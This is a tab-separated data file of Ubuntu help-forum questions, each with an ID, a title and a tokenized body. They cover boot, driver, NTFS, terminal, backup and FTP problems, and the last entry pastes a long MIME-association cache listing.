77652	gdm killed on startup	in order to fix a sound issue , i 'd completely removed all pulseaudio packages , which removed several additional packages which i had n't kept track of . i have since added back several packages that had depended upon some of the packages , such as xubuntu-desktop ( yes , i 'm using xubuntu , not the default ubuntu setup ) . unfortunately , this has broken my setup a little bit , in that on boot , my graphical desktop manager is not started automatically . ( in this case , i 'm using gdm , not lightdm ) i can switch to a virtual terminal ( via alt-f1 ) , login , then launch gdm with the following command : sudo service gdm start but this does n't solve the problem itself . i 've also discovered that gdm is being started upon boot , but it 's also getting killed by something . any help you guys can give would be great , because this is getting beyond annoying .
77654	how do i view files in list form and view hidden files from unity home ?	or otherwise how do i access file management preferences within unity ?
77655	how do i enable ntfs write support ?	the ntfs write capabilities were removed in ubuntu 11.10 . henceforth , i can not write/delete on my external ntfs hard drive , neither can i on the ntfs partition hosting ms windows . i tried to install ntfs-config ( and adding the command sudo mkdir -p /etc/hal/fdi/policy to make it work ) but before installing it , it asks for removing these packages to resolve dependencies , so what the heck ? is there any other way to write on ntfs partitions in ubuntu 11.10 ? which can be installed smoothly . remove the following packages : 1 ) flashplugin-downloader 2 ) flashplugin-installer 3 ) libasound2 4 ) libasound2-plugins 5 ) libasyncns0 6 ) libatk1.0-0 7 ) libaudio2 8 ) libavahi-client3 9 ) libavahi-common3 10 ) libc6 11 ) libcairo2 12 ) libcomerr2 13 ) libcups2 14 ) libcurl3 15 ) libdatrie1 16 ) libdb5.1 17 ) libdbus-1-3 18 ) libdbusmenu-qt2 19 ) libexpat1 20 ) libffi6 21 ) libflac8 22 ) libfontconfig1 23 ) libfreetype6 24 ) libgcc1 25 ) libgcrypt11 26 ) libgdk-pixbuf2.0-0 27 ) libglib2.0-0 28 ) libgnutls26 29 ) libgpg-error0 30 ) libgssapi-krb5-2 31 ) libgtk2.0-0 32 ) libice6 33 ) libidn11 34 ) libjack-jackd2-0 35 ) libjasper1 36 ) libjpeg62 37 ) libjson0 38 ) libk5crypto3 39 ) libkeyutils1 40 ) libkrb5-3 41 ) libkrb5support0 42 ) liblcms1 43 ) libldap-2.4-2 44 ) libmng1 45 ) libnspr4 46 ) libnspr4-0d 47 ) libnss3 48 ) libnss3-1d 49 ) libogg0 50 ) libpango1.0-0 51 ) libpcre3 52 ) libpixman-1-0 53 ) libpng12-0 54 ) libpulse0 55 ) libqt4-dbus 56 ) libqt4-declarative 57 ) libqt4-network 58 ) libqt4-script 59 ) libqt4-sql 60 ) libqt4-xml 61 ) libqt4-xmlpatterns 62 ) libqtcore4 63 ) libqtgui4 64 ) librtmp0 65 ) libsamplerate0 66 ) libsasl2-2 67 ) libsasl2-modules 68 ) libselinux1 69 ) libsm6 70 ) libsndfile1 71 ) libspeexdsp1 72 ) libsqlite3-0 73 ) libssl1.0.0 74 ) libstdc++6 75 ) libtasn1-3 76 ) libthai0 77 ) libtiff4 78 ) libuuid1 79 ) libvorbis0a 80 ) libvorbisenc2 81 ) libwrap0 82 ) libx11-6 83 ) libxau6 84 ) libxcb-render0 85 ) libxcb-shm0 86 ) libxcb1 87 ) libxcomposite1 88 ) libxcursor1 89 ) libxdamage1 90 ) libxdmcp6 91 ) libxext6 92 ) libxfixes3 93 ) libxft2 94 ) libxi6 95 ) libxinerama1 96 ) libxrandr2 97 ) libxrender1 98 ) libxss1 99 ) libxt6 100 ) libxv1 101 ) nspluginviewer 102 ) nspluginwrapper 103 ) skype 104 ) sni-qt 105 ) zlib1g thanks in advance
77657	how to enable arabic support in gnome terminal ?	i 'm trying to write arabic in the terminal app but it does not recognize right-to-left text and does not bind the arabic letters together as it should . i tried this solution https : //bugs.launchpad.net/ubuntu/+source/vte/+bug/263822 but it did not work . are there any plans to implement arabic support in the gnome terminal ? kde konsole terminal works without any problems .
77658	can you back up and restore your ubuntu machine with ubuntu for windows ?	i found this on an old posting from 2006 about how to back up and restore your ubuntu machine . http : //www.arsgeek.com/2006/10/18/how-to-back-up-and-restore-your-ubuntu-machine/ first they suggest changing to your external hard drive with : cd/media/free* ( freeagent is my external hard drive . ) then mkdir ubuntu_backup or some such name . change to that directory and then : sudo tar cvpzf ubuntusettings.backup.tgz2 -- exclude= '' /tmp/ '' / ( the ubuntusettings is my backup 's name . ) the switches are : c = create v = verbose p = preserve permission z = bzip2 f = file -- exclude is just the folders you want to exclude . i tried it out , and it does begin to back-up ; but what i noticed is that it was backing up my entire laptop ... that includes windows . i did not want that but rather i am wondering if anyone knows how to modify this so that it only backs up the ubuntu section of my laptop ? i have ubuntu for windows installed on a vista machine .
77659	why does n't ubuntu one music app ( android ) recognise mp3 files uploaded via the u1 rest api ?	i 've uploaded a few music files ( .mp3 and .ogg , no drm ) via the ubuntu one rest api . ( i 'm writing a python library that uses it . ) the ubuntu one music app on my android phone does n't pick up on these files . ( they do not appear in the library after requesting a refresh , not even under `` unknown artist '' . ) similar files uploaded via the official client , on the other hand , get picked up immediately . is this somehow expected behaviour , and i 'm just missing the explanation ? and how can i work around it ?
77661	how do i install ati radeon hd 3650 driver on my pc ?	i need help on this . i want to try using ubuntu so i downloaded the 11.10 version over the net . well after the installation my desktop , i have run the the additional drivers . it installed about 70+ items i think and after a while a window pops up and asks me about the radeon driver , something about the 2 options , the propriety drivers i think . i tried installing the 1st one but i got an error , and i tried the 2nd one and i installed it . after installation it asked me to restart . after i restart , i cant see the ubuntu interface anymore.. all i get to see is a black screen with a message moving around saying `` input not supported '' . so can i ask how can i install the graphics driver for my pc ? i want the cool effect of ubuntu.. hehehe im a super newbie in using ubuntu so please bear with me : )
77663	should i switch my graphics mode in the bios to avoid using bumblebee ?	i have just purchased a acer 3830tg , the timeline x series . to my surprise i found out that there is no first-party support for nvidia optimus for linux . bumblebee works great , but the battery life from the graphics card always running is not so great . i do n't use linux for games so i do n't really need the graphics card on , i have windows for that . in my bios , i have the ability to change my graphics mode from switchable to integrated . if i do this , reinstall ubuntu , what will happen ? will my nvidia card just turn off ? will everything work properly , as if i 'm not running an optimus laptop ? is this recommended as opposed to dealing with bumblebee ? what is the best thing i could do ?
77666	how do i recover documents from a broken ubuntu installation ?	i installed ubuntu on a hard drive that had windows xp installed so i could dual-boot the two operating systems . everything was fine but now i ca n't boot into xp or ubuntu . i had some important documents in the ubuntu partition and the hard drive is still working , so how can i recover those files from a working ubuntu installation ? where should i look for the broken ubuntu installation ?
77675	wireless not working on lenovo b-575	help , because without internet , ubuntu is useless . i ca n't enable wireless . my physical switch is on , it 's working in windows , but i just ca n't enable wireless . i updated my drivers , and when i goto turn the wireless switch on , i click on , but it immediatley goes back to off . so i turned off airplane mode , but it still goes immediatley back off . please help , immediately !
77676	who do i contact to get software updated in the software center ?	for those who are still using blender on ubuntu 11.04 , the version in the software center is out of date ( 2.49 ) . yes , it does make a difference , there was a major user interface change with the release of blender 2.5 . for those using blender in ubuntu 11.10 , the version in the software center is also out of date ( 2.57 ) . the current release of blender is 2.60. who can i contact go get the versions in the two software centers updated ? any help is much appreciated .
77689	how to share same thunderbird profile between two users ?	i have been using thunderbird e-mail client with my default account in my desktop ubuntu ( lucid lynx ) . now , i have created another user . when i start thunderbird when logged in this new account , i would like it to use exactly the same profile than the default user . let 's suppose the user/group names are default and newbie ( /home/default and /home/newbie being their home folders ) . how can i do this ? thanks !
77695	play songs in the file system queue only once ?	in the `` file system queue '' , once all the songs are done , playback returns to the `` play queue '' , that is exactly what i want . the problem is , when i add a new song to the `` file system queue '' , once that song is finished , it proceeds to play another song from the `` file system queue '' and then proceed to the `` play queue '' . so far , the only pattern i 've found is that the next song played song is always the next one alphabetically . is there anyway to automatically remove songs from the `` file system queue '' once they are done playing , or for each queued song to play only once ? edit : the pattern does n't some to be alphabetically , but rather random .
77699	nautilus does not connect via ftp after upgrade to 11.10	since i have upgraded to oneiric , nautilus is not able anymore to connect to ftp servers . when trying to connect it tells me i should use a different client . original message in german : fehler : fehler beim verbinden : verbindungsaufbau abgelehnt bitte w채hlen sie einen anderen betrachter und versuchen sie es erneut . does anybody know what that means ? thanks for helping ! i worked for a year using nautilus for some simple ftp transactions ... [ edit ] the output of my /usr/share/applications/mimeinfo.cache contents is ( i had to shorten it to be able to post it here ) : [ mime cache ] application/asx=gnome-mplayer.desktop ; application/illustrator=inkscape.desktop ; application/java-archive=sun-java6-java.desktop ; application/mbox=evolution.desktop ; application/mdb=cxassoc-cxoffice-8c8c7dce-0ab7-462d-b68b-54f9e5fc6bc3 : application_msaccess.desktop ; cxassoc-cxoffice-d5703819-3027-4eae-8127-ff0b5bc264a8 : application_msaccess.desktop ; application/mime=opera-browser.desktop ; application/msaccess=cxassoc-cxoffice-8c8c7dce-0ab7-462d-b68b-54f9e5fc6bc3 : application_msaccess.desktop ; cxassoc-cxoffice-d5703819-3027-4eae-8127-ff0b5bc264a8 : application_msaccess.desktop ; application/msexcel=cxassoc-cxoffice-8c8c7dce-0ab7-462d-b68b-54f9e5fc6bc3 : application_vnd.ms-excel.desktop ; libreoffice-calc.desktop ; cxassoc-cxoffice-8c8c7dce-0ab7-462d-b68b-54f9e5fc6bc3 : application_vnd.ms-excel : :open.desktop ; cxassoc-cxoffice-d5703819-3027-4eae-8127-ff0b5bc264a8 : application_vnd.ms-excel : :open.desktop ; cxassoc-cxoffice-d5703819-3027-4eae-8127-ff0b5bc264a8 : application_vnd.ms-excel.desktop ; application/mspowerpoint=cxassoc-cxoffice-d5703819-3027-4eae-8127-ff0b5bc264a8 : application_vnd.ms-powerpoint : :open.desktop ; cxassoc-cxoffice-d5703819-3027-4eae-8127-ff0b5bc264a8 : application_vnd.ms-powerpoint.desktop ; libreoffice-impress.desktop ; cxassoc-cxoffice-8c8c7dce-0ab7-462d-b68b-54f9e5fc6bc3 : application_vnd.ms-powerpoint : :open.desktop ; cxassoc-cxoffice-8c8c7dce-0ab7-462d-b68b-54f9e5fc6bc3 : application_vnd.ms-powerpoint : :show.desktop ; cxassoc-cxoffice-d5703819-3027-4eae-8127-ff0b5bc264a8 : application_vnd.ms-powerpoint : :new.desktop ; cxassoc-cxoffice-d5703819-3027-4eae-8127-ff0b5bc264a8 : application_vnd.ms-powerpoint : :show.desktop ; cxassoc-cxoffice-8c8c7dce-0ab7-462d-b68b-54f9e5fc6bc3 : application_vnd.ms-powerpoint : :new.desktop ; cxassoc-cxoffice-8c8c7dce-0ab7-462d-b68b-54f9e5fc6bc3 : application_vnd.ms-powerpoint.desktop ; application/msword=cxassoc-cxoffice-8c8c7dce-0ab7-462d-b68b-54f9e5fc6bc3 : application_msword : :open.desktop ; libreoffice-writer.desktop ; cxassoc-cxoffice-8c8c7dce-0ab7-462d-b68b-54f9e5fc6bc3 : application_msword.desktop ; cxassoc-cxoffice-d5703819-3027-4eae-8127-ff0b5bc264a8 : application_msword.desktop ; cxassoc-cxoffice-d5703819-3027-4eae-8127-ff0b5bc264a8 : application_msword : :open.desktop ; application/msword-template=cxassoc-cxoffice-8c8c7dce-0ab7-462d-b68b-54f9e5fc6bc3 : application_msword : :open.desktop ; cxassoc-cxoffice-8c8c7dce-0ab7-462d-b68b-54f9e5fc6bc3 : application_msword.desktop ; cxassoc-cxoffice-d5703819-3027-4eae-8127-ff0b5bc264a8 : application_msword.desktop ; cxassoc-cxoffice-d5703819-3027-4eae-8127-ff0b5bc264a8 : application_msword : :open.desktop ; application/musepack=gnome-mplayer.desktop ; banshee.desktop ; application/mxf=totem.desktop ; application/ogg=foobnix.desktop ; gnome-mplayer.desktop ; guayadeque.desktop ; clementine.desktop ; audacity.desktop ; soundconverter.desktop ; totem.desktop ; banshee.desktop ; vlc.desktop ; application/pcx=phatch.desktop ; phatch-inspector.desktop ; application/pdf=evince.desktop ; gimp.desktop ; pdfchain.desktop ; inkscape.desktop ; acroread.desktop ; application/pgp-encrypted=seahorse-pgp-encrypted.desktop ; application/pgp-keys=seahorse-pgp-keys.desktop ; application/pgp-signature=seahorse-pgp-signature.desktop ; application/postscript=evince.desktop ; gimp.desktop ; inkscape.desktop ; application/powerpoint=cxassoc-cxoffice-d5703819-3027-4eae-8127-ff0b5bc264a8 : application_vnd.ms-powerpoint : :open.desktop ; cxassoc-cxoffice-d5703819-3027-4eae-8127-ff0b5bc264a8 : application_vnd.ms-powerpoint.desktop ; cxassoc-cxoffice-8c8c7dce-0ab7-462d-b68b-54f9e5fc6bc3 : application_vnd.ms-powerpoint : :open.desktop ; cxassoc-cxoffice-8c8c7dce-0ab7-462d-b68b-54f9e5fc6bc3 : application_vnd.ms-powerpoint : :show.desktop ; cxassoc-cxoffice-d5703819-3027-4eae-8127-ff0b5bc264a8 : application_vnd.ms-powerpoint : :new.desktop ; cxassoc-cxoffice-d5703819-3027-4eae-8127-ff0b5bc264a8 : application_vnd.ms-powerpoint : :show.desktop ; cxassoc-cxoffice-8c8c7dce-0ab7-462d-b68b-54f9e5fc6bc3 : application_vnd.ms-powerpoint : :new.desktop ; cxassoc-cxoffice-8c8c7dce-0ab7-462d-b68b-54f9e5fc6bc3 : application_vnd.ms-powerpoint.desktop ; application/ram=totem.desktop ; application/rdf+xml=opera-browser.desktop ; firefox.desktop ; firefox-4.0.desktop ; thunderbird.desktop ; application/rss+xml=opera-browser.desktop ; firefox.desktop ; firefox-4.0.desktop ; banshee.desktop ; thunderbird.desktop ; application/rtf=libreoffice-writer.desktop ; cxassoc-cxoffice-8c8c7dce-0ab7-462d-b68b-54f9e5fc6bc3 : application_msword.desktop ; cxassoc-cxoffice-d5703819-3027-4eae-8127-ff0b5bc264a8 : application_msword.desktop ; application/sdp=totem.desktop ; application/smil=gnome-mplayer.desktop ; totem.desktop ; application/smil+xml=totem.desktop ; application/vnd.adobe.pdx=acroread.desktop ; application/vnd.adobe.xdp+xml=acroread.desktop ; [ ... ] application/vnd.ms-wpl=totem.desktop ; application/vnd.msaccess=cxassoc-cxoffice-8c8c7dce-0ab7-462d-b68b-54f9e5fc6bc3 : application_msaccess.desktop ; cxassoc-cxoffice-d5703819-3027-4eae-8127-ff0b5bc264a8 : application_msaccess.desktop ; application/vnd.oasis.opendocument.database=libreoffice-base.desktop ; application/vnd.oasis.opendocument.formula=libreoffice-math.desktop ; application/vnd.oasis.opendocument.graphics=libreoffice-draw.desktop ; application/vnd.oasis.opendocument.graphics-template=libreoffice-draw.desktop ; application/vnd.oasis.opendocument.presentation=evince.desktop ; libreoffice-impress.desktop ; application/vnd.oasis.opendocument.presentation-template=libreoffice-impress.desktop ; application/vnd.oasis.opendocument.spreadsheet=libreoffice-calc.desktop ; application/vnd.oasis.opendocument.spreadsheet-template=libreoffice-calc.desktop ; application/vnd.oasis.opendocument.text=libreoffice-writer.desktop ; application/vnd.oasis.opendocument.text-master=libreoffice-writer.desktop ; application/vnd.oasis.opendocument.text-template=libreoffice-writer.desktop ; application/vnd.oasis.opendocument.text-web=libreoffice-writer.desktop ; application/vnd.openofficeorg.extension=libreoffice-startcenter.desktop ; application/vnd.openxmlformats-officedocument.presentationml.presentation=libreoffice-impress.desktop ; cxassoc-cxoffice-8c8c7dce-0ab7-462d-b68b-54f9e5fc6bc3 : application_vnd.openxmlformats-officedocument.presentationml.presentation.desktop ; cxassoc-cxoffice-8c8c7dce-0ab7-462d-b68b-54f9e5fc6bc3 : application_vnd.openxmlformats-officedocument.presentationml.presentation : :show.desktop ; application/vnd.openxmlformats-officedocument.presentationml.slide=cxassoc-cxoffice-8c8c7dce-0ab7-462d-b68b-54f9e5fc6bc3 : application_vnd.openxmlformats-officedocument.presentationml.slide : :show.desktop ; cxassoc-cxoffice-8c8c7dce-0ab7-462d-b68b-54f9e5fc6bc3 : application_vnd.openxmlformats-officedocument.presentationml.slide.desktop ; application/vnd.openxmlformats-officedocument.presentationml.slideshow=cxassoc-cxoffice-8c8c7dce-0ab7-462d-b68b-54f9e5fc6bc3 : application_vnd.openxmlformats-officedocument.presentationml.slideshow.desktop ; application/vnd.openxmlformats-officedocument.presentationml.template=libreoffice-impress.desktop ; cxassoc-cxoffice-8c8c7dce-0ab7-462d-b68b-54f9e5fc6bc3 : application_vnd.openxmlformats-officedocument.presentationml.template.desktop ; cxassoc-cxoffice-8c8c7dce-0ab7-462d-b68b-54f9e5fc6bc3 : application_vnd.openxmlformats-officedocument.presentationml.template : :show.desktop ; cxassoc-cxoffice-8c8c7dce-0ab7-462d-b68b-54f9e5fc6bc3 : application_vnd.openxmlformats-officedocument.presentationml.template : :open.desktop ; application/vnd.openxmlformats-officedocument.spreadsheetml.sheet=libreoffice-calc.desktop ; cxassoc-cxoffice-8c8c7dce-0ab7-462d-b68b-54f9e5fc6bc3 : application_vnd.openxmlformats-officedocument.spreadsheetml.sheet.desktop ; application/vnd.openxmlformats-officedocument.spreadsheetml.template=cxassoc-cxoffice-8c8c7dce-0ab7-462d-b68b-54f9e5fc6bc3 : application_vnd.openxmlformats-officedocument.spreadsheetml.template : :open.desktop ; cxassoc-cxoffice-8c8c7dce-0ab7-462d-b68b-54f9e5fc6bc3 : application_vnd.openxmlformats-officedocument.spreadsheetml.template.desktop ; libreoffice-calc.desktop ; application/vnd.openxmlformats-officedocument.wordprocessingml.document=libreoffice-writer.desktop ; cxassoc-cxoffice-8c8c7dce-0ab7-462d-b68b-54f9e5fc6bc3 : application_vnd.openxmlformats-officedocument.wordprocessingml.document.desktop ; application/vnd.openxmlformats-officedocument.wordprocessingml.template=libreoffice-writer.desktop ; cxassoc-cxoffice-8c8c7dce-0ab7-462d-b68b-54f9e5fc6bc3 : application_vnd.openxmlformats-officedocument.wordprocessingml.template.desktop ; cxassoc-cxoffice-8c8c7dce-0ab7-462d-b68b-54f9e5fc6bc3 : application_vnd.openxmlformats-officedocument.wordprocessingml.template : :open.desktop ; application/vnd.rn-realaudio=gnome-mplayer.desktop ; application/vnd.rn-realmedia=gnome-mplayer.desktop ; totem.desktop ; vlc.desktop ; application/vnd.scribus=scribus.desktop ; application/vnd.stardivision.calc=libreoffice-calc.desktop ; application/vnd.stardivision.chart=libreoffice-calc.desktop ; application/vnd.stardivision.draw=libreoffice-draw.desktop ; application/vnd.stardivision.impress=libreoffice-impress.desktop ; application/vnd.stardivision.math=libreoffice-math.desktop ; application/vnd.stardivision.writer=libreoffice-writer.desktop ; application/vnd.sun.xml.base=libreoffice-base.desktop ; application/vnd.wordperfect=libreoffice-writer.desktop ; application/vnd.xara=xaralx.desktop ; application/wordperfect=libreoffice-writer.desktop ; application/x-7z-compressed=file-roller.desktop ; application/x-7z-compressed-tar=file-roller.desktop ; application/x-ace=file-roller.desktop ; application/x-alz=file-roller.desktop ; application/x-anjuta=anjuta.desktop ; application/x-ape=gnome-mplayer.desktop ; banshee.desktop ; application/x-ar=file-roller.desktop ; application/x-arj=file-roller.desktop ; application/x-audacity-project=audacity.desktop ; application/x-bittorrent=transmission-gtk.desktop ; application/x-brasero=brasero.desktop ; application/x-bzdvi=evince.desktop ; application/x-bzip=file-roller.desktop ; application/x-bzip-compressed-tar=file-roller.desktop ; mount-archive.desktop ; application/x-bzip1=file-roller.desktop ; application/x-bzip1-compressed-tar=file-roller.desktop ; application/x-bzpdf=evince.desktop ; application/x-bzpostscript=evince.desktop ; application/x-cabinet=file-roller.desktop ; application/x-cb7=evince.desktop ; application/x-cbr=evince.desktop ; file-roller.desktop ; application/x-cbt=evince.desktop ; application/x-cbz=evince.desktop ; file-roller.desktop ; application/x-cd-image=brasero.desktop ; file-roller.desktop ; mount-archive.desktop ; application/x-cdrdao-toc=brasero.desktop ; application/x-chm=xchm.desktop ; application/x-compress=file-roller.desktop ; application/x-compressed-tar=file-roller.desktop ; mount-archive.desktop ; application/x-cpio=file-roller.desktop ; mount-archive.desktop ; application/x-cue=brasero.desktop ; application/x-dbf=libreoffice-calc.desktop ; application/x-deb=ubuntu-software-center.desktop ; gdebi.desktop ; file-roller.desktop ; application/x-debian-package=ubuntu-software-center.desktop ; gdebi.desktop ; application/x-democracy=banshee.desktop ; application/x-doc=libreoffice-writer.desktop ; application/x-drm-v2=gnome-mplayer.desktop ; application/x-dvi=evince.desktop ; application/x-ear=file-roller.desktop ; application/x-extension-m4a=totem.desktop ; banshee.desktop ; application/x-extension-mp4=totem.desktop ; banshee.desktop ; vlc.desktop ; application/x-extension-xar=xaralx.desktop ; application/x-flac=gnome-mplayer.desktop ; guayadeque.desktop ; soundconverter.desktop ; totem.desktop ; banshee.desktop ; vlc.desktop ; application/x-flash-video=avidemux-gtk.desktop ; totem.desktop ; banshee.desktop ; application/x-font-bdf=fontforge.desktop ; application/x-font-otf=fontforge.desktop ; gnome-font-viewer.desktop ; application/x-font-pcf=fontforge.desktop ; gnome-font-viewer.desktop ; application/x-font-tex=fontforge.desktop ; application/x-font-ttf=fontforge.desktop ; gnome-font-viewer.desktop ; application/x-font-type1=fontforge.desktop ; gnome-font-viewer.desktop ; application/x-glade=glade-3.desktop ; application/x-gnome-saved-search=nautilus-folder-handler.desktop ; application/x-gnome-theme-package=gnome-theme-installer.desktop ; application/x-grsync-session=grsync.desktop ; application/x-gtar=file-roller.desktop ; application/x-gzdvi=evince.desktop ; application/x-gzip=file-roller.desktop ; application/x-gzpdf=evince.desktop ; application/x-gzpostscript=evince.desktop ; file-roller.desktop ; application/x-id3=gnome-mplayer.desktop ; banshee.desktop ; application/x-jar=sun-java6-java.desktop ; application/x-java-archive=sun-java6-java.desktop ; file-roller.desktop ; application/x-java-jnlp-file=sun-java6-javaws.desktop ; application/x-lha=file-roller.desktop ; application/x-lhz=file-roller.desktop ; application/x-linguist=banshee.desktop ; application/x-lrzip=file-roller.desktop ; application/x-lrzip-compressed-tar=file-roller.desktop ; application/x-lzip=file-roller.desktop ; application/x-lzip-compressed-tar=file-roller.desktop ; application/x-lzma=file-roller.desktop ; application/x-lzma-compressed-tar=file-roller.desktop ; application/x-lzop=file-roller.desktop ; application/x-lzop-compressed-tar=file-roller.desktop ; application/x-matroska=totem.desktop ; banshee.desktop ; vlc.desktop ; application/x-mdb=cxassoc-cxoffice-8c8c7dce-0ab7-462d-b68b-54f9e5fc6bc3 : application_msaccess.desktop ; cxassoc-cxoffice-d5703819-3027-4eae-8127-ff0b5bc264a8 : application_msaccess.desktop ; application/x-mimearchive=opera-browser.desktop ; application/x-miro=banshee.desktop ; application/x-mmg-settings=mkvmergegui.desktop ; application/x-mplayer2=gnome-mplayer.desktop ; application/x-ms-dos-executable=wine.desktop ; file-roller.desktop ; cxassoc-cxoffice-0 : application_x-crossover-exe : :run.desktop ; application/x-ms-shortcut=wine.desktop ; application/x-ms-wmv=gnome-mplayer.desktop ; application/x-msaccess=cxassoc-cxoffice-8c8c7dce-0ab7-462d-b68b-54f9e5fc6bc3 : application_msaccess.desktop ; cxassoc-cxoffice-d5703819-3027-4eae-8127-ff0b5bc264a8 : application_msaccess.desktop ; application/x-msexcel=cxassoc-cxoffice-8c8c7dce-0ab7-462d-b68b-54f9e5fc6bc3 : application_vnd.ms-excel.desktop ; cxassoc-cxoffice-8c8c7dce-0ab7-462d-b68b-54f9e5fc6bc3 : application_vnd.ms-excel : :open.desktop ; cxassoc-cxoffice-d5703819-3027-4eae-8127-ff0b5bc264a8 : application_vnd.ms-excel : :open.desktop ; cxassoc-cxoffice-d5703819-3027-4eae-8127-ff0b5bc264a8 : application_vnd.ms-excel.desktop ; application/x-msi=wine.desktop ; application/x-mspowerpoint=cxassoc-cxoffice-d5703819-3027-4eae-8127-ff0b5bc264a8 : application_vnd.ms-powerpoint : :open.desktop ; cxassoc-cxoffice-d5703819-3027-4eae-8127-ff0b5bc264a8 : application_vnd.ms-powerpoint.desktop ; cxassoc-cxoffice-8c8c7dce-0ab7-462d-b68b-54f9e5fc6bc3 : application_vnd.ms-powerpoint : :open.desktop ; cxassoc-cxoffice-8c8c7dce-0ab7-462d-b68b-54f9e5fc6bc3 : application_vnd.ms-powerpoint : :show.desktop ; cxassoc-cxoffice-d5703819-3027-4eae-8127-ff0b5bc264a8 : application_vnd.ms-powerpoint : :new.desktop ; cxassoc-cxoffice-d5703819-3027-4eae-8127-ff0b5bc264a8 : application_vnd.ms-powerpoint : :show.desktop ; cxassoc-cxoffice-8c8c7dce-0ab7-462d-b68b-54f9e5fc6bc3 : application_vnd.ms-powerpoint : :new.desktop ; cxassoc-cxoffice-8c8c7dce-0ab7-462d-b68b-54f9e5fc6bc3 : application_vnd.ms-powerpoint.desktop ; application/x-msword=cxassoc-cxoffice-8c8c7dce-0ab7-462d-b68b-54f9e5fc6bc3 : application_msword.desktop ; cxassoc-cxoffice-d5703819-3027-4eae-8127-ff0b5bc264a8 : application_msword.desktop ; application/x-musepack=gnome-mplayer.desktop ; banshee.desktop ; application/x-netshow-channel=totem.desktop ; banshee.desktop ; application/x-nsv-vp3-mp3=gnome-mplayer.desktop ; application/x-ogg=foobnix.desktop ; gnome-mplayer.desktop ; clementine.desktop ; soundconverter.desktop ; totem.desktop ; banshee.desktop ; vlc.desktop ; application/x-ogm-audio=clementine.desktop ; application/x-onboard=onboard.desktop ; application/x-onboardsettings=onboard-settings.desktop ; application/x-opera-extension=opera-browser.desktop ; application/x-opera-uniteapplication=opera-browser.desktop ; application/x-opera-widgets=opera-widget-installer.desktop ; application/x-phatch=phatch.desktop ; phatch-inspector.desktop ; application/x-qtconfig=qt3config.desktop ; application/x-quicktime-media-link=totem.desktop ; banshee.desktop ; application/x-quicktimeplayer=gnome-mplayer.desktop ; totem.desktop ; banshee.desktop ; application/x-rar=file-roller.desktop ; application/x-rar-compressed=file-roller.desktop ; application/x-remote-connection=vinagre.desktop ; application/x-rpm=file-roller.desktop ; application/x-rzip=file-roller.desktop ; application/x-scantailor=scantailor.desktop ; application/x-shellscript=emacs23.desktop ; application/x-shockwave-flash=avidemux-gtk.desktop ; vlc.desktop ; application/x-shorten=totem.desktop ; banshee.desktop ; application/x-smil=totem.desktop ; application/x-sony-bbeb=lrfviewer.desktop ; application/x-stuffit=file-roller.desktop ; application/x-tar=file-roller.desktop ; mount-archive.desktop ; application/x-tarz=file-roller.desktop ; application/x-toc=brasero.desktop ; application/x-troff-msvideo=banshee.desktop ; application/x-virtualbox-ova=virtualbox.desktop ; application/x-virtualbox-ovf=virtualbox.desktop ; application/x-virtualbox-vbox=virtualbox.desktop ; application/x-virtualbox-vbox-extpack=virtualbox.desktop ; application/x-vnc=vinagre-file.desktop ; application/x-vorbis+ogg=gnome-mplayer.desktop ; application/x-war=file-roller.desktop ; application/x-xz=file-roller.desktop ; application/x-xz-compressed-tar=file-roller.desktop ; application/x-zip=file-roller.desktop ; application/x-zip-compressed=file-roller.desktop ; application/x-zoo=file-roller.desktop ; application/xhtml+xml=opera-browser.desktop ; firefox.desktop ; firefox-4.0.desktop ; thunderbird.desktop ; application/xhtml_xml=chromium-browser.desktop ; application/xml=opera-browser.desktop ; firefox.desktop ; firefox-4.0.desktop ; thunderbird.desktop ; application/xspf+xml=totem.desktop ; banshee.desktop ; application/zip=file-roller.desktop ; mount-archive.desktop ; audio/3gpp=totem.desktop ; banshee.desktop ; audio/amr=totem.desktop ; banshee.desktop ; audio/amr-wb=totem.desktop ; banshee.desktop ; audio/aac=clementine.desktop ; audio/ac3=totem.desktop ; banshee.desktop ; audio/ape=gnome-mplayer.desktop ; banshee.desktop ; audio/avi=banshee.desktop ; audio/basic=gnome-mplayer.desktop ; audacity.desktop ; totem.desktop ; banshee.desktop ; audio/flac=gnome-mplayer.desktop ; banshee.desktop ; audio/midi=gnome-mplayer.desktop ; totem.desktop ; banshee.desktop ; audio/mp=gnome-mplayer.desktop ; banshee.desktop ; audio/mp2=banshee.desktop ; audio/mp3=gnome-mplayer.desktop ; banshee.desktop ; audio/mp4=gnome-mplayer.desktop ; guayadeque.desktop ; clementine.desktop ; totem.desktop ; banshee.desktop ; vlc.desktop ; audio/mp4a-latm=banshee.desktop ; audio/mpc=gnome-mplayer.desktop ; banshee.desktop ; audio/mpeg=foobnix.desktop ; gnome-mplayer.desktop ; guayadeque.desktop ; clementine.desktop ; audacity.desktop ; soundconverter.desktop ; totem.desktop ; banshee.desktop ; vlc.desktop ; audio/mpeg2=gnome-mplayer.desktop ; audio/mpeg3=gnome-mplayer.desktop ; banshee.desktop ; audio/mpegurl=guayadeque.desktop ; clementine.desktop ; totem.desktop ; banshee.desktop ; audio/musepack=gnome-mplayer.desktop ; banshee.desktop ; audio/ogg=gnome-mplayer.desktop ; guayadeque.desktop ; clementine.desktop ; totem.desktop ; banshee.desktop ; audio/prs.sid=totem.desktop ; audio/vnd.rn-realaudio=clementine.desktop ; totem.desktop ; vlc.desktop ; audio/vorbis=gnome-mplayer.desktop ; clementine.desktop ; banshee.desktop ; audio/wav=gnome-mplayer.desktop ; banshee.desktop ; audio/wave=banshee.desktop ; audio/webm=gnome-mplayer.desktop ; audio/x-aiff=audacity.desktop ; totem.desktop ; audio/x-amzxml=banshee.desktop ; audio/x-ape=gnome-mplayer.desktop ; guayadeque.desktop ; totem.desktop ; banshee.desktop ; audio/x-basic=gnome-mplayer.desktop ; audio/x-flac=foobnix.desktop ; gnome-mplayer.desktop ; guayadeque.desktop ; clementine.desktop ; totem.desktop ; banshee.desktop ; vlc.desktop ; [ ... ] audio/x-realaudio=gnome-mplayer.desktop ; totem.desktop ; audio/x-s3m=gnome-mplayer.desktop ; banshee.desktop ; audio/x-sbc=totem.desktop ; banshee.desktop ; audio/x-scpls=foobnix.desktop ; gnome-mplayer.desktop ; clementine.desktop ; brasero.desktop ; soundconverter.desktop ; totem.desktop ; banshee.desktop ; vlc.desktop ; audio/x-speex=clementine.desktop ; totem.desktop ; banshee.desktop ; audio/x-tta=totem.desktop ; banshee.desktop ; audio/x-vorbis=gnome-mplayer.desktop ; clementine.desktop ; totem.desktop ; banshee.desktop ; audio/x-vorbis+ogg=foobnix.desktop ; gnome-mplayer.desktop ; clementine.desktop ; totem.desktop ; banshee.desktop ; 